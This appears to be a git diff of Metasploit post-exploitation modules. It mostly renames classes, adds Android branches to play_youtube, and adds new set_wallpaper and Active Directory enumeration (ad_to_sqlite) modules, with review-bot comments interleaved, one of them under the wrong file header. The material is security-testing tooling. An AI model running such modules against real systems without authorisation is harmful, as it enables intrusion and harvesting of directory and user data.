+++ b/modules/post/multi/gather/thunderbird_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index cdb498623a..c5858ff51f 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/google/geolocation' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/close.rb b/modules/post/multi/general/close.rb index 443f40d0b0..33720b0c42 100644 --- a/modules/post/multi/general/close.rb +++ b/modules/post/multi/general/close.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/execute.rb b/modules/post/multi/general/execute.rb index 0318bda57e..2f3c39248d 100644 --- a/modules/post/multi/general/execute.rb +++ b/modules/post/multi/general/execute.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/wall.rb b/modules/post/multi/general/wall.rb index 563ccfe3c3..d9f7b32f6e 100644 --- a/modules/post/multi/general/wall.rb +++ b/modules/post/multi/general/wall.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info = {}) super( update_info( diff --git a/modules/post/multi/manage/dbvis_add_db_admin.rb b/modules/post/multi/manage/dbvis_add_db_admin.rb index eb8d5f1956..ef965c3053 100644 --- a/modules/post/multi/manage/dbvis_add_db_admin.rb 
+++ b/modules/post/multi/manage/dbvis_add_db_admin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/manage/dbvis_query.rb b/modules/post/multi/manage/dbvis_query.rb index ebc9518926..efed0c9bcf 100644 --- a/modules/post/multi/manage/dbvis_query.rb +++ b/modules/post/multi/manage/dbvis_query.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/manage/multi_post.rb b/modules/post/multi/manage/multi_post.rb index fd93ae6132..69f450a4de 100644 --- a/modules/post/multi/manage/multi_post.rb +++ b/modules/post/multi/manage/multi_post.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index 0c5d85ce3d..492d18e8ed 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], - 'Platform' => [ 'win', 'osx', 'linux' ], + 'Platform' => [ 'win', 'osx', 'linux', 'android' ], 'SessionTypes' => [ 'shell', 'meterpreter' ] )) 
@@ -94,6 +94,19 @@ class Metasploit3 < Msf::Post true end + # + # The Android version is launched via an Intent + # + def android_start_video(id) + intenturl = "intent://youtube.com/watch?v=#{id}&autoplay=1#Intent;scheme=http;action=android.intent.action.VIEW;end" + begin + session.android.activity_start(intenturl) + rescue Rex::Post::Meterpreter::RequestError => e + return false + end + true + end + def start_video(id) case session.platform when /osx/ @@ -102,6 +115,8 @@ class Metasploit3 < Msf::Post win_start_video(id) when /linux/ linux_start_video(id) + when /android/ + android_start_video(id) end end diff --git a/modules/post/multi/manage/record_mic.rb b/modules/post/multi/manage/record_mic.rb index bce65e61da..442fc81efc 100644 --- a/modules/post/multi/manage/record_mic.rb +++ b/modules/post/multi/manage/record_mic.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report diff --git a/modules/post/multi/manage/set_wallpaper.rb b/modules/post/multi/manage/set_wallpaper.rb new file mode 100644 index 0000000000..0008a53ab7 --- /dev/null +++ b/modules/post/multi/manage/set_wallpaper.rb 
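Review bot: `android_start_video` calls `session.android.activity_start`, but the module's `SessionTypes` (visible in the previous hunk of this file) still lists `shell`, and only `Rex::Post::Meterpreter::RequestError` is rescued. On a non-Meterpreter session whose platform matches `/android/`, the call would presumably raise `NoMethodError` instead of returning false like the other failure path. A guard at the top of the method, `return false unless session.type == 'meterpreter'`, would keep the true/false contract. The rescued exception is bound to `e` but never used; either drop `=> e` or report it with `vprint_error(e.message)` so a failed intent launch is not silent. The rest of `start_video` lies outside the hunk.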
@@ -0,0 +1,97 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Windows::Registry + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Multi Manage Set Wallpaper', + 'Description' => %q( + This module will set the desktop wallpaper background on the specified session. + The method of setting the wallpaper depends on the platform type. + ), + 'License' => MSF_LICENSE, + 'Author' => [ 'timwr'], + 'Platform' => [ 'win', 'osx', 'linux', 'android' ], + 'SessionTypes' => [ 'meterpreter' ] + ) + ) + + register_options( + [ + OptPath.new('WALLPAPER_FILE', [true, 'The local wallpaper file to set on the remote session']) + ], self.class) + end + + def upload_wallpaper(tempdir, file) + remote_file = "#{tempdir}#{File.basename(file)}" + print_status("#{peer} - Uploading to #{remote_file}") + + write_file(remote_file, File.binread(file)) + print_status("#{peer} - Uploaded to #{remote_file}") + remote_file + end + + # + # The OS X version uses an AppleScript to do this + # + def osx_set_wallpaper(file) + remote_file = upload_wallpaper("/tmp/", file) + script = %(osascript -e 'tell application "Finder" to set desktop picture to POSIX file "#{remote_file}"') + begin + cmd_exec(script) + rescue EOFError + return false + end + true + end + + # + # The Windows version uses the SystemParametersInfo call + # + def win_set_wallpaper(file) + remote_file = upload_wallpaper("%TEMP%\\", file) + client.railgun.user32.SystemParametersInfoA(0x0014, nil, remote_file, 0x2) != 0 + end + + # + # The Android version uses the set_wallpaper command + # + def android_set_wallpaper(file) + client.android.set_wallpaper(File.binread(file)) + true + end + + def os_set_wallpaper(file) + if session.type =~ /meterpreter/ && session.sys.config.sysinfo['OS'] =~ /darwin/i + platform = 'osx' + 
else + platform = session.platform + end + case platform + when /osx/ + osx_set_wallpaper(file) + when /win/ + win_set_wallpaper(file) + when /android/ + android_set_wallpaper(file) + end + end + + def run + file = datastore['WALLPAPER_FILE'] + if os_set_wallpaper(file) + print_good("#{peer} - The wallpaper has been set") + else + print_error("#{peer} - Unable to set the wallpaper") + end + end +end diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index bcc5a44ed6..aa19dd6eb7 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/powershell' require 'msf/core/post/windows/powershell' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Exploit::Powershell include Post::Windows::Powershell diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index afa83fcea1..fdb85616f2 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/multi/manage/system_session.rb b/modules/post/multi/manage/system_session.rb index 7042d04d9f..894d7c538e 100644 --- a/modules/post/multi/manage/system_session.rb +++ b/modules/post/multi/manage/system_session.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/recon/local_exploit_suggester.rb b/modules/post/multi/recon/local_exploit_suggester.rb index 823c8b71e4..eeb0a2087a 100644 --- a/modules/post/multi/recon/local_exploit_suggester.rb +++ b/modules/post/multi/recon/local_exploit_suggester.rb 
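Review bot: `'Platform'` advertises `linux`, but the `case platform` in `os_set_wallpaper` only has branches for osx, win and android and no `else`. On a Linux session it returns nil, and `run` prints "Unable to set the wallpaper" with no reason. Either remove `'linux'` from `'Platform'` or end the case with `else`, `print_error("#{peer} - Unsupported platform #{platform}")` and `false`. Separately, `osx_set_wallpaper` interpolates `remote_file` (built from `File.basename(file)`) into a command line that is quoted for both the shell and AppleScript, so a file name containing a quote character breaks the command; such names should be rejected or escaped before the string is built. `android_set_wallpaper` returns true unconditionally and does not rescue `Rex::Post::Meterpreter::RequestError`, so a failed call surfaces as an exception rather than the false that `run` expects.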
@@ -7,7 +7,7 @@ require 'msf/core' include Msf::Auxiliary::Report -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/osx/admin/say.rb b/modules/post/osx/admin/say.rb index 2d11de9201..d5438ac54e 100644 --- a/modules/post/osx/admin/say.rb +++ b/modules/post/osx/admin/say.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/osx/capture/keylog_recorder.rb b/modules/post/osx/capture/keylog_recorder.rb index 2f7e3c1710..f4c01bd106 100644 --- a/modules/post/osx/capture/keylog_recorder.rb +++ b/modules/post/osx/capture/keylog_recorder.rb @@ -5,7 +5,7 @@ require 'shellwords' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/capture/screen.rb b/modules/post/osx/capture/screen.rb index 02ce7c8cdf..467adc9572 100644 --- a/modules/post/osx/capture/screen.rb +++ b/modules/post/osx/capture/screen.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb index 88546475f6..708cfde81d 100644 --- a/modules/post/osx/gather/autologin_password.rb +++ b/modules/post/osx/gather/autologin_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File # extract/verify by by XORing your kcpassword with your password diff --git a/modules/post/osx/gather/enum_adium.rb b/modules/post/osx/gather/enum_adium.rb index f6b668343a..f498e9dee0 100644 --- a/modules/post/osx/gather/enum_adium.rb +++ b/modules/post/osx/gather/enum_adium.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/enum_airport.rb b/modules/post/osx/gather/enum_airport.rb index 3a59f7ae1e..795098850d 100644 --- a/modules/post/osx/gather/enum_airport.rb +++ b/modules/post/osx/gather/enum_airport.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/osx/gather/enum_chicken_vnc_profile.rb b/modules/post/osx/gather/enum_chicken_vnc_profile.rb index f572a2d64a..9022522173 100644 --- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb +++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/gather/enum_colloquy.rb b/modules/post/osx/gather/enum_colloquy.rb index 27197533b5..6e46582d28 100644 --- a/modules/post/osx/gather/enum_colloquy.rb +++ b/modules/post/osx/gather/enum_colloquy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/gather/enum_keychain.rb b/modules/post/osx/gather/enum_keychain.rb index a4fbe15cc5..93b173aea9 100644 --- a/modules/post/osx/gather/enum_keychain.rb +++ b/modules/post/osx/gather/enum_keychain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::OSX::System include Msf::Exploit::FileDropper diff --git a/modules/post/osx/gather/enum_osx.rb b/modules/post/osx/gather/enum_osx.rb index fa87e2c46c..c4d89e9b16 100644 --- a/modules/post/osx/gather/enum_osx.rb +++ b/modules/post/osx/gather/enum_osx.rb 
@@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb index 4125e961ac..7d169c573a 100644 --- a/modules/post/osx/gather/hashdump.rb +++ b/modules/post/osx/gather/hashdump.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post # set of accounts to ignore while pilfering data OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"] diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb index 1ba4c2be21..fd0474bd38 100644 --- a/modules/post/osx/gather/password_prompt_spoof.rb +++ b/modules/post/osx/gather/password_prompt_spoof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 1763927d2d..26e48f2357 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb index 4db60b33c1..b6751b6d7e 100644 --- a/modules/post/osx/manage/mount_share.rb +++ b/modules/post/osx/manage/mount_share.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post # list of accepted file share protocols. other "special" URLs (like vnc://) will be ignored. FILE_SHARE_PROTOCOLS = %w(smb nfs cifs ftp afp) 
diff --git a/modules/post/osx/manage/record_mic.rb b/modules/post/osx/manage/record_mic.rb index 6cf17e92ed..85f702f928 100644 --- a/modules/post/osx/manage/record_mic.rb +++ b/modules/post/osx/manage/record_mic.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'shellwords' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::OSX::RubyDL diff --git a/modules/post/osx/manage/vpn.rb b/modules/post/osx/manage/vpn.rb index cff9656d91..c7d095ba0b 100644 --- a/modules/post/osx/manage/vpn.rb +++ b/modules/post/osx/manage/vpn.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/osx/manage/webcam.rb b/modules/post/osx/manage/webcam.rb index 973e2b24f7..5b8f9be4f1 100644 --- a/modules/post/osx/manage/webcam.rb +++ b/modules/post/osx/manage/webcam.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'shellwords' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::OSX::RubyDL diff --git a/modules/post/solaris/gather/checkvm.rb b/modules/post/solaris/gather/checkvm.rb index 6a8a049fbe..cf2796a0c7 100644 --- a/modules/post/solaris/gather/checkvm.rb +++ b/modules/post/solaris/gather/checkvm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::Priv diff --git a/modules/post/solaris/gather/enum_packages.rb b/modules/post/solaris/gather/enum_packages.rb index 9f3895a9a2..3e7857ba1a 100644 --- a/modules/post/solaris/gather/enum_packages.rb +++ b/modules/post/solaris/gather/enum_packages.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::System 
diff --git a/modules/post/solaris/gather/enum_services.rb b/modules/post/solaris/gather/enum_services.rb index cdbd17dd57..322d754938 100644 --- a/modules/post/solaris/gather/enum_services.rb +++ b/modules/post/solaris/gather/enum_services.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::System diff --git a/modules/post/solaris/gather/hashdump.rb b/modules/post/solaris/gather/hashdump.rb index 85e30d43b8..94f85bb769 100644 --- a/modules/post/solaris/gather/hashdump.rb +++ b/modules/post/solaris/gather/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Solaris::Priv diff --git a/modules/post/windows/capture/keylog_recorder.rb b/modules/post/windows/capture/keylog_recorder.rb index 857ae41b71..6a3afe14fc 100644 --- a/modules/post/windows/capture/keylog_recorder.rb +++ b/modules/post/windows/capture/keylog_recorder.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::File diff --git a/modules/post/windows/capture/lockout_keylogger.rb b/modules/post/windows/capture/lockout_keylogger.rb index ba6680db44..2c829a3508 100644 --- a/modules/post/windows/capture/lockout_keylogger.rb +++ b/modules/post/windows/capture/lockout_keylogger.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/windows/escalate/droplnk.rb b/modules/post/windows/escalate/droplnk.rb index 66c0028d56..f77a636064 100644 --- a/modules/post/windows/escalate/droplnk.rb +++ b/modules/post/windows/escalate/droplnk.rb 
@@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/escalate/getsystem.rb b/modules/post/windows/escalate/getsystem.rb index a155bb9166..e7bebe5ad6 100644 --- a/modules/post/windows/escalate/getsystem.rb +++ b/modules/post/windows/escalate/getsystem.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv diff --git a/modules/post/windows/escalate/golden_ticket.rb b/modules/post/windows/escalate/golden_ticket.rb index 09abdec2b3..8d1dd0b530 100644 --- a/modules/post/windows/escalate/golden_ticket.rb +++ b/modules/post/windows/escalate/golden_ticket.rb @@ -3,7 +3,7 @@ require 'msf/core/post/windows/netapi' require 'msf/core/post/windows/kiwi' require 'msf/core/post/windows/error' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::NetAPI include Msf::Post::Windows::Accounts include Msf::Post::Windows::Kiwi diff --git a/modules/post/windows/escalate/ms10_073_kbdlayout.rb b/modules/post/windows/escalate/ms10_073_kbdlayout.rb index 928f36fccf..4aadfeb3fe 100644 --- a/modules/post/windows/escalate/ms10_073_kbdlayout.rb +++ b/modules/post/windows/escalate/ms10_073_kbdlayout.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, diff --git a/modules/post/windows/escalate/screen_unlock.rb b/modules/post/windows/escalate/screen_unlock.rb index abb3304552..9cfc306460 100644 --- a/modules/post/windows/escalate/screen_unlock.rb +++ b/modules/post/windows/escalate/screen_unlock.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasm' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super(update_info(info, 
diff --git a/modules/post/windows/gather/ad_to_sqlite.rb b/modules/post/windows/gather/ad_to_sqlite.rb
new file mode 100644
index 0000000000..5f84cad615
--- /dev/null
+++ b/modules/post/windows/gather/ad_to_sqlite.rb
@@ -0,0 +1,561 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex'
+require 'msf/core'
+require 'sqlite3'
+
+class MetasploitModule < Msf::Post
+ include Msf::Post::Windows::LDAP
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'AD Computer, Group and Recursive User Membership to Local SQLite DB',
+ 'Description' => %{
+ This module will gather a list of AD groups, identify the users (taking into account recursion)
+ and write this to a SQLite database for offline analysis and query using normal SQL syntax.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>'
+ ],
+ 'Platform' => [ 'win' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+
+ register_options([
+ OptString.new('GROUP_FILTER', [false, 'Additional LDAP filters to use when searching for initial groups', '']),
+ OptBool.new('SHOW_USERGROUPS', [true, 'Show the user/group membership in a greppable form to the console.', false]),
+ OptBool.new('SHOW_COMPUTERS', [true, 'Show basic computer information in a greppable form to the console.', false]),
+ OptInt.new('THREADS', [true, 'Number of threads to spawn to gather membership of each group.', 20])
+ ], self.class)
+ end
+
+ # Entry point
+ def run
+ max_search = datastore['MAX_SEARCH']
+
+ db, dbfile = create_sqlite_db
+ print_status "Database created: #{dbfile}"
+
+ # Download the list of groups from Active Directory
+ vprint_status "Retrieving AD Groups"
+ begin
+ group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount', 'comment', 'managedBy', 'cn']
+ if datastore['GROUP_FILTER'].nil? || datastore['GROUP_FILTER'].empty?
+ group_query = "(objectClass=group)"
+ else
+ group_query = "(&(objectClass=group)(#{datastore['GROUP_FILTER']}))"
+ end
+ groups = query(group_query, max_search, group_fields)
+ rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e
+ print_error("Error(Group): #{e.message}")
+ return
+ end
+
+ # If no groups were downloaded, there's no point carrying on
+ if groups.nil? || groups[:results].empty?
+ print_error('No AD groups were discovered')
+ return
+ end
+
+ # Go through each of the groups and identify the individual users in each group
+ vprint_status "Groups retrieval completed: #{groups[:results].size} group(s)"
+ vprint_status "Retrieving AD Group Membership"
+ users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount', 'comment', 'title', 'cn', 'adminCount', 'manager']
+
+ remaining_groups = groups[:results]
+
+ # If the number of threads exceeds the number of groups, reduce them down to the correct number
+ threadcount = remaining_groups.count < datastore['THREADS'] ? remaining_groups.count : datastore['THREADS']
+
+ # Loop through each of the groups, creating threads where necessary
+ while !remaining_groups.nil? && !remaining_groups.empty?
+ group_gather = []
+ 1.upto(threadcount) do
+ group_gather << framework.threads.spawn("Module(#{refname})", false, remaining_groups.shift) do |individual_group|
+ begin
+
+ next if !individual_group || individual_group.empty? || individual_group.nil?
+
+ # Get the Group RID
+ group_rid = get_rid(individual_group[1][:value]).to_i
+
+ # Perform the ADSI query to retrieve the effective users in each group (recursion)
+ vprint_status "Retrieving members of #{individual_group[3][:value]}"
+ users_filter = "(&(objectCategory=person)(objectClass=user)(|(memberOf:1.2.840.113556.1.4.1941:=#{individual_group[0][:value]})(primaryGroupID=#{group_rid})))"
+ users_in_group = query(users_filter, max_search, users_fields)
+
+ grouptype_int = individual_group[7][:value].to_i # Set this here because it is used a lot below
+ sat_int = individual_group[2][:value].to_i
+
+ # Add the group to the database
+ # groupType parameter interpretation: https://msdn.microsoft.com/en-us/library/windows/desktop/ms675935(v=vs.85).aspx
+ # Note that the conversions to UTF-8 are necessary because of the way SQLite detects column type affinity
+ # Turns out that the 'fix' is documented in https://github.com/rails/rails/issues/1965
+ sql_param_group = { g_rid: group_rid,
+ g_distinguishedName: individual_group[0][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ g_sAMAccountType: sat_int,
+ g_sAMAccountName: individual_group[3][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ g_whenChanged: individual_group[4][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ g_whenCreated: individual_group[5][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ g_description: individual_group[6][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ g_groupType: grouptype_int,
+ g_adminCount:
individual_group[8][:value].to_i,
+ g_comment: individual_group[9][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ g_managedBy: individual_group[10][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ g_cn: individual_group[11][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
+ # Specifies a group that is created by the system.
+ g_GT_GROUP_CREATED_BY_SYSTEM: (grouptype_int & 0x00000001).zero? ? 0 : 1,
+ # Specifies a group with global scope.
+ g_GT_GROUP_SCOPE_GLOBAL: (grouptype_int & 0x00000002).zero? ? 0 : 1,
+ # Specifies a group with local scope.
+ g_GT_GROUP_SCOPE_LOCAL: (grouptype_int & 0x00000004).zero? ? 0 : 1,
+ # Specifies a group with universal scope.
+ g_GT_GROUP_SCOPE_UNIVERSAL: (grouptype_int & 0x00000008).zero? ? 0 : 1,
+ # Specifies an APP_BASIC group for Windows Server Authorization Manager.
+ g_GT_GROUP_SAM_APP_BASIC: (grouptype_int & 0x00000010).zero? ? 0 : 1,
+ # Specifies an APP_QUERY group for Windows Server Authorization Manager.
+ g_GT_GROUP_SAM_APP_QUERY: (grouptype_int & 0x00000020).zero? ? 0 : 1,
+ # Specifies a security group. If this flag is not set, then the group is a distribution group.
+ g_GT_GROUP_SECURITY: (grouptype_int & 0x80000000).zero? ? 0 : 1,
+ # The inverse of the flag above. Technically GT_GROUP_SECURITY=0 makes it a distribution
+ # group so this is arguably redundant, but I have included it for ease. It makes a lot more sense
+ # to set DISTRIBUTION=1 in a query when your mind is on other things to remember that
+ # DISTRIBUTION is in fact the inverse of SECURITY...:)
+ g_GT_GROUP_DISTRIBUTION: (grouptype_int & 0x80000000).zero? ? 1 : 0,
+ # Now add sAMAccountType constants
+ g_SAM_DOMAIN_OBJECT: (sat_int == 0) ?
1 : 0,
+ g_SAM_GROUP_OBJECT: (sat_int == 0x10000000) ? 1 : 0,
+ g_SAM_NON_SECURITY_GROUP_OBJECT: (sat_int == 0x10000001) ? 1 : 0,
+ g_SAM_ALIAS_OBJECT: (sat_int == 0x20000000) ? 1 : 0,
+ g_SAM_NON_SECURITY_ALIAS_OBJECT: (sat_int == 0x20000001) ? 1 : 0,
+ g_SAM_NORMAL_USER_ACCOUNT: (sat_int == 0x30000000) ? 1 : 0,
+ g_SAM_MACHINE_ACCOUNT: (sat_int == 0x30000001) ? 1 : 0,
+ g_SAM_TRUST_ACCOUNT: (sat_int == 0x30000002) ? 1 : 0,
+ g_SAM_APP_BASIC_GROUP: (sat_int == 0x40000000) ? 1 : 0,
+ g_SAM_APP_QUERY_GROUP: (sat_int == 0x40000001) ? 1 : 0,
+ g_SAM_ACCOUNT_TYPE_MAX: (sat_int == 0x7fffffff) ? 1 : 0
+ }
+ run_sqlite_query(db, 'ad_groups', sql_param_group)
+
+ # Go through each group user
+ next if users_in_group[:results].empty?
+ users_in_group[:results].each do |group_user|
+ user_rid = get_rid(group_user[1][:value]).to_i
+ print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS']
+
+ uac_int = group_user[7][:value].to_i # Set this because it is used so frequently below
+ sat_int = group_user[2][:value].to_i
+
+ # Add the group to the database
+ # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx
+ sql_param_user = { u_rid: user_rid,
+ u_distinguishedName: group_user[0][:value].encode('UTF-16be', invalid: :replace, undef: :replace, replace: '?').encode('UTF-8', invalid: :replace, undef: :replace, replace: '?'),
